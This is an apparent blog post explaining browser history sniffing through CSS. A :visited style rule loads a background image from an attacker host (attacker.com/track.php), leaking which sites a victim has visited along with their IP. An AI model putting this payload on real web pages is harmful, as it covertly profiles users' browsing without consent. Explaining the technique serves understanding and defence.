For a recent talk I took the opportunity to look a little deeper into browser history stealing.

The goal at Browser History Stealing is to get information about the browser history of a victim. This information can be very valuable for profiling and other stuff. But this is another blog post.

Performing browser history stealing, or like other say browser history sniffing, via CSS is quite simple. All you need is a web page and a style sheet. Sadly it is not possible to ask the browser direct about the visited webpages. Therefore we have to do it indirect by placing links we would like to know about on a webpage(i.e. in an IFrame):

<A HREF=”www.its-blog.de/?p=27″ id=”link1″>this page</A>

On the URL you add the ID tag. This tag is used to identify the rules how the link has to be displayed.

Lets have a look at the style sheet:

#link1 {
   color: blue;
}

#link1:visited {
   color: red;
   background:
   url(http://www.attacker.com/track.php?url=www.its-blog.de/?p=27);
}

The trick starts with the background image.  Inside the visited part of the style sheet we ask the browser to display a background image. Since the browser want to safe bandwidth, this image is loaded only when it is needed, meaning when the link has been visited. Due to the fact that the we encoded the URL we wanted to check inside the image name we can create a script track.php which delivers back a 1×1 pixel image in white and safes the IP and the URL tag of the request.

As mentioned above this works only for pages the adversary assumes that the victim has visited them.

to be continued ….